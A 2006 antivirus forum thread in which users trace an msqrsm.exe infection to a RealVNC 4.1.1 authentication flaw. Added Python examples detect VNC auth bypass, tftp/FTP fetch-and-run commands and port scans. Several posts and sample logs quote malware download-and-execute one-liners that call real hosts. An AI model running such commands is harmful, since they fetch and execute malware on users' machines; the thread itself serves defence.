Avast WEBforum

Consumer Products => Avast Free Antivirus / Premium Security (legacy Pro Antivirus, Internet Security, Premier) => Topic started by: aplcom on September 20, 2006, 09:11:16 AM

Title: DOS (tftp) virus
Post by: aplcom on September 20, 2006, 09:11:16 AM
Hi,

Not sure if anyone has encountered this virus and whether there is a fix. This virus has attacked my wife's W2K Pro notebook (all security updates etc. up to date) running ZoneAlarm (Home free - all updates up to date) and avast (Home/Free edition - all updates up to date).

Periodically, the WINx (cmd) gets executed - the (cmd) black box comes up and the command [ tftp -i xxx.xxx.xxx.xxxx msqrsm.exe ] and a short while later it tries to run msqrsm. The IP address is different each time this happens. I had already renamed the tftp command so it never gets executed and hence the pgm doesn't get downloaded.

How do I find which program or service is the culprit (may be a valid winx service that was compromised??) and stop this nonsense from continuing??

A bit of background - I had noticed that her computer was acting erratically so I rebooted with a clean WINX LIVE CD and did a complete clean with avast of her HDD and in fact found several pgms that had been hit by a virus - the identified pgms were deleted - I then proceeded to clean the registry of the bad items - and did a manual cleanup of some dirs found in "program files" - the culprit seems to have been gray_pigeon_hacker.com.

Also, if possible, can anyone shed light on how this virus was able to infect even through ZoneAlarm and avast (BTW: she also runs SpywareBlaster and Spybot Search & Destroy)?? (So I can prevent this from happening again!!)

Thanks for any help in this regard.

Rgds. Otto.
Title: Re: DOS (tftp) virus
Post by: cylosine on September 22, 2006, 04:08:15 AM
I can confirm this experience: my daughter's desktop PC, Windows 2000, suddenly did the same and she managed to take some notes which I am deciphering. I have only just found this forum item with msqrsm:exe (I have deliberately inserted the colon).

However in our case an attempt was also made to download the program msinexecs:exe, of which I have been unable to find much information. Some hints were found on a Norwegian site.

The PC runs Sygate Personal Firewall, AVG Free, Ad-Aware and Spybot Search and Destroy; so far we don't think we have found anything about where it originates.

Date noticed 19th or 20th September, in Belgium

I ask the same question, how can it get 'out' with the firewall running and giving no notice.

C
Title: Re: DOS (tftp) virus
Post by: mauserme on September 22, 2006, 06:09:26 AM
Hi aplcom and cylosine.  Welcome to the forums.

@aplcom

There is information about msqrsm.exe here

http://virusinfo.prevx.com/pxparall.asp?PXC=e36042251362

@cylosine

I think msinexecs.exe might be related to this

http://fileinfo.prevx.com/fileinfo.asp?PXC=0e5033782633

You could both try the trial version of Prevx that you can download from

http://www.prevx.com/

The two options on the web page, "Clean and Protect My PC Now" and "Protect My PC Now" download the same file afaik.

A word of caution - Prevx is a powerful program and, because of this, it uses a lot of resources when running.  In addition to removing some malware it's also an IPS (intrusion prevention software) so it will sometimes block programs you want to run, or stop and ask if you want to allow a program to run.  This can be annoying.  But its software database, which is built on user input, is quite extensive so it will recognize most programs it encounters.


EDIT:  BTW, aplcom, did avast! find and clean RBOT on your wife's computer?
Title: Re: DOS (tftp) virus
Post by: aplcom on September 22, 2006, 02:50:56 PM
Hi Mauserme,

Thanks for the info. I will try the prevx stuff and see if that clears it up - else I may have no choice but to re-install (my last option!!).

I searched and looked for RBOT but saw no signs of it - unless you are referring to something else. When I ran from a clean 'LIVE WIN CD' it did clean up several programs that were attacked - I will upload the list once I get my hands on her computer (currently I'm on contract in Singapore and she is in HK !!) within the next few days.

I am still very curious how all this came about - running ZONEALARM & AVAST - how did her computer get infected. Was it via an email? or by visiting a website? or did someone simply target an attack on her IP and somehow compromised insecure aspects of WIN2000PRO??

Again thanks for the replies and helping cure this ill.

Rgds. Otto.
Title: Re: DOS (tftp) virus
Post by: aplcom on September 22, 2006, 07:43:22 PM
Hi,

I managed to access my wife's computer via VNC, and guess what? Prevx found 3 files that were virused - in system32 it found (shell32.exe, kernel32.exe and dc1.exe) - it cleaned them up. I then found these same entries in the registry (run as services and also in explorer bars) and proceeded to delete them. Seems that all is back to normal.

Surprised that AVAST did not catch these files - even after I scanned them manually!!

Again thanks to mauserme.

Rgds. otto.
Title: Re: DOS (tftp) virus
Post by: mauserme on September 22, 2006, 10:59:55 PM
Quote from: aplcom
I am still very curious how all this came about - running ZONEALARM & AVAST - how did her computer get infected. Was it via an email? or by visiting a website? or did someone simply target an attack on her IP and somehow compromised insecure aspects of WIN2000PRO??

Surprised that AVAST did not catch these files - even after I scanned them manually!!

You're welcome Otto.  I'm glad it worked out this easily.

I don't know if you noticed on the Prevx page, this was first seen in their community on September 17.   Avast! probably does not have a signature yet (if you have it in the Prevx quarantine and you're adventuresome you could send a sample). 

As far as how it got past ZA, my guess is that it's disguising itself as an allowed program or possibly, if it uses a name like IEXPLORE.EXE, your wife might have allowed the connection when ZA asked.

Keith
Title: Re: DOS (tftp) virus
Post by: cylosine on September 23, 2006, 08:06:12 AM
Hi Mauserme,

This link helped me get some more information; I am struggling to find much:
http://virusinfo.prevx.com/pxparall.asp?PXC=e36042251362

This link does not convince me it has to do with msinexecs.exe:
http://fileinfo.prevx.com/fileinfo.asp?PXC=0e5033782633

The info from aplcom is very interesting; looking at the files shows you don't want to have them on your computer. The 3 files named are well known as bad ones; surprising that scanning with AVAST has not brought them to light. I do however know nothing much about AVAST. If these files are involved in our case it means that AVG cannot find them either.

I have however not been able to convince myself that any of the file names I have seen are the original cause of the present problem; I see them as the result of another program that has been started.

Which one or ones, is still completely unclear; I will wait patiently to see what emerges from the Internet.

C.
Title: Re: DOS (tftp) virus
Post by: mauserme on September 23, 2006, 04:18:29 PM
Hi cylosine,

The connection between msinexecs.exe and the Prevx link I posted in my response to you was actually drawn by Prevx rather than me:

http://fileinfo.prevx.com/fileinfoweek.asp?mk=24/07/2006

[screenshot of the Prevx page: http://img125.imageshack.us/img125/7158/prevxpagehz1.png]

Waiting for additional information to become available may be a good approach because, as you say, there is very little on the web at the moment.  You could also post a HijackThis log and we could ask Eddy to take a look.
Title: Re: DOS (tftp) virus
Post by: cylosine on September 23, 2006, 05:55:15 PM
Hi mauserme,

I went back to prevx once more and had much more luck.
http://fileinfo.prevx.com/adware/qqccf340481465-msin23040165/msinexecs.exe.html

Others interested, go to the same place and use the search facility to find more msinexecs.exe files; there are a heap of variations. Bad news is that it is a heavy-duty version that is about at the moment.

Found enough information to convince myself that a bot controller is hanging around somewhere and has managed to fool our firewall.

HJT shows nothing, experts have looked and I have compared with a previous clear report and could not see anything suspicious.

The computer is in another continent so I have limited access, it is going to be a drawn out affair.  I will report back as it goes on.
Title: Re: DOS (tftp) virus
Post by: DavidR on September 23, 2006, 06:22:59 PM
Quote from: cylosine
Found enough information to convince myself that a bot controller is hanging around somewhere and has managed to fool our firewall.

I didn't notice you mentioned what firewall you use?

Hardware firewalls don't usually provide outbound protection nor does windows XP's firewall.
Any malware that manages to get past your defences will have free rein to connect to the internet to either download more of the same, pass your personal data (sensitive or otherwise, user names, passwords, keylogger retrieved data, etc.) or open a backdoor to your computer, so outbound protection is essential.

Quote from: cylosine
HJT shows nothing, experts have looked and I have compared with a previous clear report and could not see anything suspicious.
Might be time for a look at Hidden things http://invisiblethings.org
Title: Re: DOS (tftp) virus
Post by: mauserme on September 23, 2006, 07:58:17 PM
Maybe it's just me but I still think it's worth giving Prevx a try.  From the url you posted, cylosine:

"New Users: You can download the full Prevx1 product and use it to cleanup and remove MSINEXECS.EXE and other infections free of charge ..."
Title: Re: DOS (tftp) virus
Post by: Lisandro on September 23, 2006, 11:20:46 PM
Quote from: mauserme
Maybe it's just me but I still think it's worth giving Prevx a try.
I liked this program when it was freeware.
I hate freeware becoming shareware.
I don't trust (or like) companies that use this marketing policy.
Maybe it's just me  8)
Title: Re: DOS (tftp) virus
Post by: Bluesman on September 24, 2006, 01:34:12 AM
Quote from: Lisandro
I don't trust (or like) companies that use this marketing policy.
Maybe it's just me  8)

Waving with my hand...no Tech, it's not just you :) I also don't like it
Title: Re: DOS (tftp) virus
Post by: cylosine on September 24, 2006, 02:05:21 AM
@DavidR,
I did mention the firewall right at the beginning, Sygate Personal Firewall (the free version) has been very handy.  Your comments are correct and a bit disheartening. SPF certainly picks up two way traffic.

@mauserme,
I am contemplating Prevx and I did notice the offer. Just reluctant to use yet another.
Title: Re: DOS (tftp) virus
Post by: aplcom on September 24, 2006, 03:44:39 AM
Hi Mauserme (Keith),

Seems that I was barking up the wrong tree all along. The PREVX1 idea was good and it did help. However, after my (premature) posting that all was well, the darn DOS box popped up again and the tftp -i command started mysteriously executing again.

I finally got fed up and used Ethereal to monitor the network and FINALLY found the culprit. Remember I said I fixed my wife's computer via VNC - well, guess what?? RealVNC (v4.1.1) had a security flaw in it and it was able to be compromised. Once I upgraded to v4.1.2 (flaw corrected) the problem has disappeared for good!!! Check out this site for more info.

http://www.intelliadmin.com/blog/2006/05/vnc-flaw-proof-of-concept.html

Again, much thanks Keith for your help and time.

Rgds. Otto.
Title: Re: DOS (tftp) virus
Post by: cylosine on September 24, 2006, 04:47:58 AM
Hi aplcom,

Congratulations!!  8)  The last thing I would have focused on.

Great piece of work; my daughter at the time, with 95% probability, was running the VNC 4.1.1 server to allow me to log in. Great mistake starting it up with the computer, as we rarely use it, but I thought it was safe, so when I saw it running a few weeks ago when in Europe I did not think much about it. I had been wondering if you would come back and tell that you still had the problem; I did not feel confident this was the cause you were finding, but I did not know enough to question your finding.

Naturally vnc is set to go through the firewall. I feel much better apart from the stupid thing of letting vnc run needlessly but of course the idea was I can connect whenever she is on line.

Did you work out from the packet sniffing where the origin IP was of the controller?  By the way I am no expert on packet sniffing only have the program and used it trying to figure out why my IP phone would not connect to another IP address on the same ISP network. (IP direct to IP no middleman)

Many thanks for coming to the forum sharing your information. I feel much relieved on this occasion. Will update and rename tftp as well.

C.

Title: Re: DOS (tftp) virus
Post by: mauserme on September 24, 2006, 04:51:39 AM
Very nice indeed, Otto.  Thanks for the update.
Title: Re: DOS (tftp) virus
Post by: aplcom on September 24, 2006, 01:16:55 PM
Hi Cylosine,

I used Ethereal to monitor the traffic once the run command was executed, then analysed the packet data offline. I was able to see that it was port 5900 (VNC) that was being compromised (thankfully not in full screen mode, rather strictly in command mode!!!); hence the culprit was trying to further compromise the system by downloading the worm programs and backdoors. This is a relatively new exploit so thankfully no damage was done.

I did do a trace back and found the offending IP, and reported it plus the logs to the ISP, but I doubt that anything will come of it. It's a hacker's world!!!! (At least on Win-x machines; I have no probs whatsoever on my Linux boxes!!!!!)

It is a good idea to rename or move programs like ftp, tftp, cmd.exe (or simply lock them altogether). Also a good idea to do a thorough check with AVAST as well as PREVX1 (thanks to Keith!!). You can also check out nmap as well as grc.com to check what can get through your computer IP & ports.

Good luck and hope this also solves your problem.

Rgds. Otto.
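The packet analysis Otto describes above is also the point where a defender can check the VNC handshake itself rather than only the tftp traffic that follows it. The following is an added example, not code from the thread, from RealVNC or from any vendor: it parses the RFB 3.8 version and security-type negotiation (framing as in RFC 6143, sections 7.1.1 to 7.1.3) from the two directions of one captured TCP stream on port 5900, of the kind one would extract with Ethereal/Wireshark's "Follow TCP Stream", and flags any session in which the server returned SecurityResult OK for a security type it had never offered. That mismatch is what an authentication step being skipped looks like on the wire. The two streams below are constructed for the example, and the function and constant names are this example's own.

```python
import struct

# Names for the RFB security types used below (RFC 6143 section 7.1.2).
SECURITY_TYPES = {0: "Invalid", 1: "None", 2: "VNC Authentication"}


def parse_rfb_security_handshake(server_to_client: bytes, client_to_server: bytes) -> dict:
    """Parse the RFB 3.8 version and security-type negotiation from the two
    directions of one captured TCP stream and report whether the security
    type the client chose was actually among the types the server offered.

    Stream layout (RFC 6143 sections 7.1.1-7.1.3):
      server: "RFB 003.008\\n"       client: "RFB 003.008\\n"
      server: U8 count, U8[count] offered types
      client: U8 chosen type
      server: SecurityResult U32 (directly for type 1 "None", after the
              16-byte challenge/response for type 2); 0 means OK.
    """
    if server_to_client[:12] != b"RFB 003.008\n" or client_to_server[:12] != b"RFB 003.008\n":
        raise ValueError("only RFB 3.8 streams are handled by this example")
    count = server_to_client[12]
    offered = list(server_to_client[13:13 + count])
    pos = 13 + count
    chosen = client_to_server[12]
    if chosen == 2:
        pos += 16  # skip the server's 16-byte challenge
    (result,) = struct.unpack(">I", server_to_client[pos:pos + 4])
    return {
        "offered": [SECURITY_TYPES.get(t, f"type {t}") for t in offered],
        "chosen": SECURITY_TYPES.get(chosen, f"type {chosen}"),
        "chosen_was_offered": chosen in offered,
        "session_accepted": result == 0,
        # A server that accepts a type it never offered has skipped the
        # authentication it advertised; that is the condition to alert on.
        "alert": chosen not in offered and result == 0,
    }


# Constructed streams for this example (not captured traffic). Both servers
# advertise only VNC Authentication (type 2).
VERSION = b"RFB 003.008\n"
CHALLENGE = bytes(range(16))   # stand-in for the server's random challenge
RESPONSE = bytes(16)           # stand-in for the client's DES-encrypted reply

# 1) Normal session: client picks VNC Authentication and completes it.
NORMAL_S2C = VERSION + b"\x01\x02" + CHALLENGE + struct.pack(">I", 0)
NORMAL_C2S = VERSION + b"\x02" + RESPONSE

# 2) Anomalous session: client picks "None" although it was not offered,
#    and the server still answers SecurityResult OK.
ANOMALOUS_S2C = VERSION + b"\x01\x02" + struct.pack(">I", 0)
ANOMALOUS_C2S = VERSION + b"\x01"


def check_sessions() -> dict:
    """Run the parser over both constructed sessions, keyed by name."""
    sessions = {"normal": (NORMAL_S2C, NORMAL_C2S),
                "anomalous": (ANOMALOUS_S2C, ANOMALOUS_C2S)}
    return {name: parse_rfb_security_handshake(s2c, c2s) for name, (s2c, c2s) in sessions.items()}


if __name__ == "__main__":
    for name, report in check_sessions().items():
        print(name, report)
```

The check only needs the first few dozen bytes of each direction, so it is cheap to run over every port 5900 stream in a capture; a hit means the server side should be treated as compromised regardless of what the later traffic shows.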
Title: Re: DOS (tftp) virus
Post by: mauserme on September 24, 2006, 02:52:47 PM
Quote from: Lisandro
I hate freeware becoming shareware.

I hate that too.  But it's still a good program, imo, even if the marketing strategy stinks  :)
Title: Re: DOS (tftp) virus
Post by: Lisandro on September 24, 2006, 03:40:00 PM
Quote from: mauserme
I hate that too.  But it's still a good program, imo, even if the marketing strategy stinks  :)
Other programs could do the same or better being freeware (or, at least, having a Lite or free version).
For instance: System Safety Monitor (http://syssafety.com/)  :)
Title: Re: DOS (tftp) virus
Post by: FXsan78 on September 24, 2006, 11:44:25 PM
Hello,

we have the same malware here it seems.
It is seen the same way by PrevX1, and regularly activates some cmd script TFTP xx.
It also creates louvz.exe and others in c:\windows\system32 and launches them, and a lot of bad things!
example in a cmd : cmd /c echo OPEN 82.239.65.45 27222>x&echo GET 84785_redworld2.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_redworld2.exe&del x&exit

It is MSQRSM, not detected by Avast, nor by other anti-virus (NAV, Grisoft) or anti-spyware (Ad-Aware),
but detected by PREVX1.

I'd like to send you the .exe file (237kb) for analysis and integration in the Avast database, but it is in c:\system volume information\-RESTORE{F75EEC69-6E97-419B-93B4-6A3A275301C4}\RP296\AA0044493.exe
and not accessible.
I deactivated Windows System Restore on all hard drives and rebooted, but still no access to this directory, neither directly nor for anti-virus software!
I am working remotely on my father's PC, and can't boot from a DOS disk!

Any idea please to copy this file and send to you ?
It came by clicking a url in an HTML spam email ... but I erased the email (just too soon...)

OS = Windows XP SP2 Home, up to date with updates
Avast version 4.7.871 august 2006 - skin 4.2.7.3
Athlon 64 3200+    512 MB ram
Mail client: Thunderbird
NAV + Avast

The software launches CMD windows with TFTP xx download scripts; it blocks Mozilla and Thunderbird from connecting to the web and to SMTP/POP accounts; it creates various exes in windows/system32, which are executed (seen in the Task Manager), etc. QUITE HARMFUL...

Thanks
FX
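Both the tftp command from the opening post and the echo/FTP -n -s:x chain FX quotes above are download-and-execute one-liners built entirely from tools that ship with Windows, which is why the antivirus products in the thread had nothing to match on. The following is an added example, not code from the thread or from any vendor: it scans process command lines (for instance from process-creation auditing) for such chains, extracts the remote host and file name, and records whether the fetched file is launched in the same command line. The sample lines are constructed from the commands quoted in this thread; 203.0.113.5 is a documentation address standing in for the masked one in the first post, and all function, class and regex names are this example's own.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Regexes written for this example. They cover the two download-and-execute
# chains quoted in the thread: "tftp -i <host> [GET] <file>" followed by the
# file being run, and an FTP script assembled with echo and run via
# "FTP -n -s:<script>". Windows tftp.exe defaults to GET when no verb is given.
TFTP_RE = re.compile(
    r"\btftp(?:\.exe)?\s+-i\s+(?P<host>[^\s&|]+)\s+(?:(?P<verb>get|put)\s+)?(?P<file>[^\s&|]+)",
    re.I)
FTP_SCRIPT_RE = re.compile(r"\bftp(?:\.exe)?\s+-n\s+-s:(?P<script>[^\s&|]+)", re.I)
FTP_OPEN_RE = re.compile(r"\becho\s+open\s+(?P<host>[^\s&>]+)", re.I)
FTP_GET_RE = re.compile(r"\becho\s+get\s+(?P<file>[^\s&>]+)", re.I)


@dataclass
class Finding:
    tool: str            # "tftp" or "ftp"
    host: Optional[str]  # remote host the file is fetched from, if visible
    file: Optional[str]  # name of the fetched file, if visible
    executes: bool       # the fetched file is launched in the same command line


def _runs_later(file: str, tail: str) -> bool:
    """True if `file` appears as its own command token after the download."""
    pattern = r"(?:^|[&|;\s])" + re.escape(file) + r"(?=$|[&|;\s])"
    return re.search(pattern, tail, re.I) is not None


def analyse_command_line(cmd: str) -> Optional[Finding]:
    """Return a Finding if cmd fetches a file with tftp or ftp, else None."""
    m = TFTP_RE.search(cmd)
    if m:
        if (m.group("verb") or "get").lower() == "put":
            return None  # an upload, not a download-and-run chain
        file = m.group("file")
        return Finding("tftp", m.group("host"), file, _runs_later(file, cmd[m.end():]))
    m = FTP_SCRIPT_RE.search(cmd)
    if m:
        host = FTP_OPEN_RE.search(cmd)
        get = FTP_GET_RE.search(cmd)
        file = get.group("file") if get else None
        executes = bool(file) and _runs_later(file, cmd[m.end():])
        return Finding("ftp", host.group("host") if host else None, file, executes)
    return None


def scan(lines: List[str]) -> List[Tuple[int, Finding]]:
    """Run analyse_command_line over process command lines; keep the hits."""
    hits = []
    for i, line in enumerate(lines):
        finding = analyse_command_line(line)
        if finding:
            hits.append((i, finding))
    return hits


# Constructed sample command lines (e.g. from process-creation auditing),
# modelled on the commands quoted in this thread. 203.0.113.5 is a
# documentation address standing in for the masked one in the first post.
SAMPLE_LOG = [
    "cmd /c tftp -i 203.0.113.5 GET msqrsm.exe & msqrsm.exe",
    "cmd /c echo OPEN 82.239.65.45 27222>x&echo GET 84785_redworld2.exe>>x"
    "&echo QUIT>>x&FTP -n -s:x&84785_redworld2.exe&del x&exit",
    "tftp -i 10.0.0.7 PUT backup.cfg",      # upload to an internal server
    "notepad.exe C:\\notes\\todo.txt",
]

if __name__ == "__main__":
    for i, f in scan(SAMPLE_LOG):
        print(f"line {i}: {f.tool} fetch of {f.file} from {f.host}; executes={f.executes}")
```

Any hit where `executes` is true deserves immediate attention; a plain fetch is still worth reviewing, since in Otto's case the file was run by a separate process a short while later. Renaming or restricting tftp.exe and ftp.exe, as suggested earlier in the thread, stops the chain, but logging the attempt is what tells you the host is being driven by someone else.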
Title: Re: DOS (tftp) virus
Post by: aplcom on September 25, 2006, 04:31:57 AM
Hello FX,

You mention that you are working remotely on your dad's machine? Are you using RealVNC 4.1.1? If so - it has a security hole that can be breached in the auth module. Check out this site for more info:

http://fileinfo.prevx.com/adware/qqccf340481465-msin23040165/msinexecs.exe.html

Rgds. Otto.
Title: Re: DOS (tftp) virus
Post by: cylosine on September 25, 2006, 05:20:15 AM
Hi aplcom,

Thank you for the Ethereal information, I understand; you are right that action is unlikely from the ISP. Since this is now running in Europe too I assume Scotland Yard already knows about it.

From what we experience at least on some occasions [yes still running but that was an oversight on our behalf ] seems to be a download to another IP address than the host machine.  The trouble you saw was the attempt to download to your IP address?

I just saw your question to FXsan78 come in; I was going to inquire about the version too. I guess he is in trouble as the dirty software is already running.

@FXsan78
what keyboard layout is installed on your attacked machine?  I noticed the French at the bottom and I am very interested in type of keyboard you use on the target machine.

C.
Title: Re: DOS (tftp) virus
Post by: cylosine on September 25, 2006, 05:29:15 AM
Hi aplcom,

I forgot to add that for many weeks our computer has been running in 'stealth' mode according to grc.com.  That was why I could not figure out how something had gotten through apparently without any action on the part of the operator.  It is however likely to be wishful thinking that my daughter did not get it by email.

With vnc running all the time well bad luck for us.

C.
Title: Re: DOS (tftp) virus
Post by: mauserme on September 25, 2006, 01:47:15 PM
Quote from: FXsan78
I deactivated Windows System Restore on all hard drives and rebooted, but still no access to this directory, neither directly nor for anti-virus software!

Any idea please to copy this file and send to you ?

Hi FX,

When you turned off System Restore you effectively deleted the file from that location.  If it's still on your hard drive somewhere else you can email a zipped and password-protected sample to virus@avast.com.  Make sure to explain that it is an undetected virus and provide the password in the body of your email.

If you're using RealVNC make sure you follow aplcom's link to patch this security hole.

@aplcom and cylosine,

If FX's infection is the same as yours then you may find the problem recurs even after applying the RealVNC patch.  If it does then do as FX did:  turn off System Restore, reboot, and scan again.
Title: Re: DOS (tftp) virus
Post by: cylosine on September 25, 2006, 04:16:32 PM
We have installed RealVNC 4.1.2 and are trying to log the attacks. They seem to still occur but now Sygate Personal Firewall is warning of attempts to connect VNC session. We have decided to keep VNC server running for a while.

From the data we believe that the attack is coming from a computer in the same big network which our computer is connected to. I am guessing this is a random number and that it is automated.  Hope to catch a few more before the attacks stop. The originator can't be that silly to keep it up for a long time allowing tracing.

I noticed that the free version of VNC is a bit limited in the use of encryption for this reason I am reconsidering its use over the internet, it is a bit of a jungle to get through safely.

C.
Title: Re: DOS (tftp) virus
Post by: aplcom on September 25, 2006, 04:43:12 PM
Hi,

I've not had any recurrence at all. Once I realized what the problem was, I booted from a clean "Win Live CD" and cleaned the HDD (deleted all tmp areas, deleted recycled etc. etc. etc.), ran several different antivirus scanners and also manually cleaned the registry. I also put cmd.exe, tftp.exe, ftp.exe and several other pgms into a secure area only accessible by me (also renamed those pgms) just to be safe. I also re-installed the firewall from scratch and set new rules (using ZoneAlarm - ONLY VNC has server rights, all else locked out).

I agree - the attack seems to occur on the same ISP network (mine is 221.124.x.y), which leads me to believe that someone's computer on the network is compromised and the hacker is using that system to hack others on the same network. As the attack is identical every time, I also can't believe the hacker to be so stupid (hence it may be a bot??)

You can also consider UltraVNC or TightVNC - both are free, both offer super encryption, both don't have the auth security hole - however, RealVNC 4.1.2 seems to have solved most of my problems.

Keeping my fingers crossed - but all's well so far!!

Rgds.
Title: Re: DOS (tftp) virus
Post by: FXsan78 on September 27, 2006, 01:07:43 AM
Hello,

@aplcom/Otto, yes I was using RealVNC 4.1.1.
I upgraded to 4.2 (30days version) after reading the post here.
Now I have found back a version 4.1.2 which is full without 30 days licence. I will install it back after solving everything

@cylosine, yes AZERTY french keyboard

@mauserme, as I said I deleted the email I suspected to have the link importing the virus, and sorry I could not send it to you

Tonight NAV reports a Magister virus. I will try remove tool, but will need some local aid for booting in safe mode ;-)

Thanks to all
fX
Title: Re: DOS (tftp) virus
Post by: cylosine on September 27, 2006, 01:48:04 AM
Hi FXsan78,

VNC 4.2 is the "VNC Personal" version which costs money, I also got a bit confused and downloaded this but went searching a bit more for the so called "VNC Free" until I found it.

I am making a strong guess that the machine that attacked you also had a French AZERTY keyboard; this however is unlikely to be of any help.

Depending on how familiar you are with computers I can recommend always having a Bart PE boot disk, this is a short version of Windows which will boot and run windows off a CD and you can access your hard disk from this environment.

This is similar to what aplcom is saying about using a "Win Live CD".

C.
Title: Re: DOS (tftp) virus
Post by: leiw on October 01, 2006, 08:53:31 AM
Hi all, this is my first post,

My company has 4 servers running: 3 are Windows 2000 and 1 is Windows 2003. 4 days ago, when I was using VNC to remote to my company servers from my home, I saw all servers automatically open a cmd command in Run, and in the command automatically type tftp -i 0.0.0.0 GET msqrsm.exe and then msqrsm.exe. I checked the firewall log: it always had my server SRC address 192.168.0.3 to DEST address 192.168.x.x (x.x means random), SRC port 22xx (xx means random), DEST port 5900, and in 1 min it can send many packets to random private IPs....

Can any brother tell me what type of virus infected them, and how to fix this problem?
Or do I just need to upgrade the VNC version to 4.1.2 to solve all problems?

Home VNC version 4.1.2, company server VNC version 4.1.1


Thanks !!!
Wilson
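Wilson's firewall log pattern above, one internal source address sending many connection attempts per minute to random internal addresses on port 5900 from ephemeral source ports, is the signature of a host that has been taken over and is now scanning for further VNC servers; the source address, not the destinations, is the machine to isolate. The following is an added example (not Wilson's log and not Shorewall's code) that parses iptables-style log lines of the kind Shorewall writes, groups them by source host and minute, and reports any source that tried to reach ten or more distinct hosts on port 5900 within one minute. The log lines are constructed for the example; the threshold, the function names and the addresses are this example's assumptions.

```python
import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

# Fields of interest in an iptables/Shorewall style log line (netfilter LOG
# target format: "... SRC=a.b.c.d DST=e.f.g.h ... PROTO=TCP SPT=n DPT=m ...").
FIELD_RE = re.compile(r"\b(SRC|DST|PROTO|SPT|DPT)=(\S+)")
# syslog timestamp at the start of the line, e.g. "Oct  1 10:02:13"
TS_RE = re.compile(r"^(?P<mon>[A-Z][a-z]{2})\s+(?P<day>\d{1,2})\s+(?P<h>\d\d):(?P<m>\d\d):(?P<s>\d\d)")


def parse_line(line: str) -> Optional[dict]:
    """Return a dict with minute bucket, src, dst, proto and ports, or None."""
    ts = TS_RE.match(line)
    fields = dict(FIELD_RE.findall(line))
    if not ts or not {"SRC", "DST", "DPT"} <= fields.keys():
        return None
    return {
        "minute": f"{ts['mon']} {int(ts['day'])} {ts['h']}:{ts['m']}",
        "src": fields["SRC"],
        "dst": fields["DST"],
        "proto": fields.get("PROTO", "?"),
        "spt": int(fields.get("SPT", 0)),
        "dpt": int(fields["DPT"]),
    }


def find_port_scanners(lines: List[str], port: int = 5900,
                       threshold: int = 10) -> Dict[Tuple[str, str], List[str]]:
    """Map (src, minute) -> sorted distinct destinations for every source that
    tried to reach `threshold` or more distinct hosts on `port` within one
    minute. The source address is the host to suspect, not the destinations."""
    fanout = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["proto"] == "TCP" and rec["dpt"] == port:
            fanout[(rec["src"], rec["minute"])].add(rec["dst"])
    return {key: sorted(dsts) for key, dsts in fanout.items() if len(dsts) >= threshold}


# Constructed sample log (not a real capture), shaped like the pattern
# reported in the thread: 192.168.0.3 hits twelve different internal hosts
# on TCP/5900 within one minute from source ports 22xx, while an admin
# workstation 192.168.0.10 makes three legitimate connections to one server.
LINE = ("Oct  1 10:02:{sec:02d} fw kernel: Shorewall:loc2net:REJECT:IN=eth1 OUT=eth0 "
        "SRC={src} DST={dst} LEN=48 TOS=0x00 PREC=0x00 TTL=127 ID={id} DF "
        "PROTO=TCP SPT={spt} DPT={dpt} WINDOW=65535 RES=0x00 SYN URGP=0")


def build_sample_log() -> List[str]:
    lines = [LINE.format(sec=5 + i, src="192.168.0.3", dst=f"192.168.{i % 3}.{20 + i}",
                         id=1000 + i, spt=2200 + i, dpt=5900) for i in range(12)]
    lines += [LINE.format(sec=30 + i, src="192.168.0.10", dst="192.168.0.3",
                          id=2000 + i, spt=3300 + i, dpt=5900) for i in range(3)]
    lines.append(LINE.format(sec=40, src="192.168.0.3", dst="192.168.0.1",
                             id=3000, spt=2300, dpt=53))   # ordinary DNS, ignored
    return lines


if __name__ == "__main__":
    for (src, minute), dsts in find_port_scanners(build_sample_log()).items():
        print(f"{minute}: {src} probed {len(dsts)} hosts on tcp/5900: {', '.join(dsts)}")
```

Counting distinct destinations rather than raw packets is what separates a scan from a single noisy but legitimate session, which is why the admin workstation's three connections to one server are not reported.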
 
Title: Re: DOS (tftp) virus
Post by: cylosine on October 01, 2006, 09:30:19 AM
Hi leiw,
May you find inspiration and help in the forum.

1.. Version 4.1.1 you cannot get rid of fast enough, especially now you have seen that somebody knows, perhaps accidentally, that your servers exist.

Upgrading to 4.1.2 gets you over the initial flaw, but if you are using the free version I would suggest you review this for use over the internet. Reading the small print/manual or specs closer, this is not recommended when you cross the internet jungle as the password encryption is not strong. The normal session information, I understand, is just open to anybody with no encryption.

I forgot this and happily used it for 12 months until it went bad.  If your company information is important you should consider the 'bigger' versions which have much better encryption and encryption on the session transmissions.  Convince yourself you understand all this because I am not an expert, just have some reasonable understanding about various aspects of computing.

Consider moving away from using the default port of 5900, perhaps that may give you some protection. "everybody" knows that port and will almost by default have this in their software. Just makes it a little bit harder for unwanted sniffing.

I am deliberately using the underscore in the next lines

tftp -i 0.0.0.0 GET msqrsm_exe

msqrsm_exe

My understanding is the first line  downloads the dirty file to IP address 0.0.0.0 where I am not sure of the importance of 0.0.0.0, I had expected your Public IP address here, could be a very good thing.

The second line executes the msqrsm_exe, if it had been downloaded to your machines or network, you must go looking for how to get rid of what it has downloaded.

The only place I have seen help is PREVX1, I am still trying to find out more. Actually I have put our machine on sort of hold as I have run out of energy to focus on just this bastard.

Like you I have still no idea how our machine got activated.  Because we used vnc 4.1.1 I am assuming that somehow an accidental portscan revealed our existence on the net despite running in stealth mode behind a software firewall. Unfortunately the NAT router was not installed on the cable modem. We did not have that extra protection, which you seem to have as you are on a 192.168.1.x network.

Do you have a software firewall as well as NAT, I may be a little bit out on deep water as you talked about servers and I talk about hosts. You may be better protected.

Have you the facility to log all incoming and outgoing traffic?  If so this should reveal a lot about what msqrsm_exe does.

Where it came from? No idea

Good luck and I hope it did not run.

C.

Title: Re: DOS (tftp) virus
Post by: leiw on October 01, 2006, 11:02:45 AM
To Cylosine:

Thanks for your reply. I will go back to the company to upgrade the VNC to version 4.1.2. One question is: after upgrading the VNC, will the auto command disappear? Or do I need to use PREVX1 to clear all dirty files? But I think maybe it cannot clear all dirty files, because I tried it.

I am using Shorewall, which is a free Linux firewall including NAT, packet filtering etc. Now I have dropped all outgoing traffic to prevent this. I will post the firewall log when I go back to the company.

Title: Re: DOS (tftp) virus
Post by: cylosine on October 01, 2006, 02:58:22 PM
Hi leiw

1.. The command windows may disappear, if they are coming from the outside.
2.. If you have any trace of malware still around, try PREVX1, I have still not found any other mention on the net. But I am not looking at the moment.
C.
Title: Re: DOS (tftp) virus
